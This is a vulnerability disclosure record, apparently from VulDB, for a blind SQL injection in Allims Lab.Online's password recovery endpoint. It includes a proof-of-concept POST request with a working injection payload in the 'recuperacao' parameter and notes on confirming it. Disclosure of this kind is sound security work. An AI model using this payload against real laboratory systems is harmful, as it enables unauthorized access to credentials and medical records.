Submit #493492: Allims Lab.Online Latest SQL Injection With High Privilegesinfo

Title	Allims Lab.Online Latest SQL Injection With High Privileges
Description	Product: Lab.Online Vendor: ALLÌMS (https://www.allims.com.br/allims-lab-online/) Vulnerability Type: SQL Injection (Boolean-Based Blind) Affected Endpoint: /model/model_recuperar_senha.php (POST request) Vulnerable Parameter: recuperacao Severity: Critical A critical SQL injection vulnerability (with high privileges) was identified in Lab.Online, a widely used laboratory management system developed by ALLÌMS. The vulnerability resides in the password recovery function, where the recuperacao parameter is improperly sanitized, allowing attackers to manipulate the SQL query structure. This flaw can be exploited to extract sensitive data, bypass authentication, or achieve full database compromise. Proof of Concept (PoC): http://x.x.x.x/ POST /model/model_recuperar_senha.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Accept: / X-Requested-With: XMLHttpRequest Referer: http://x.x.x.x/ Cookie: PHPSESSID=eq502tqahlboq5g517deke9e77 Content-Length: 59 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Host: x.x.x.x Connection: Keep-alive &recuperacao=-1'%20OR%20321=6%20AND%2000018=00018%20--%20 Exploitation Details: - The SQL injection is Boolean-Based Blind, meaning it alters the database query logic and observes the application's response to infer data. - The payload -1' OR 321=6 AND 00018=00018 -- ensures a true condition is always met. - Modifying 321=6 to an incorrect statement (e.g., 321=7) can confirm the injection vulnerability. Impact: - An attacker can exploit this vulnerability to: - Bypass authentication, gaining unauthorized access to sensitive data. - Extract database information, including user credentials, medical records, and administrative data. - Alter database contents, leading to data manipulation or deletion. - Compromise the entire system, potentially using the vulnerability for further privilege escalation.
Source	⚠️ https://www.allims.com.br/allims-lab-online/
User	Stux (UID 40142)
Submission	02/01/2025 16:46 (1 Year ago)
Moderation	02/10/2025 08:53 (9 days later)
Status	Accepted
VulDB entry	295061 [Allims lab.online up to 20250201 model_recuperar_senha.php recuperacao sql injection]
Points	20

◂ Previous Overview Next ▸

Want to stay up to date on a daily basis?

Enable the mail alert feature now!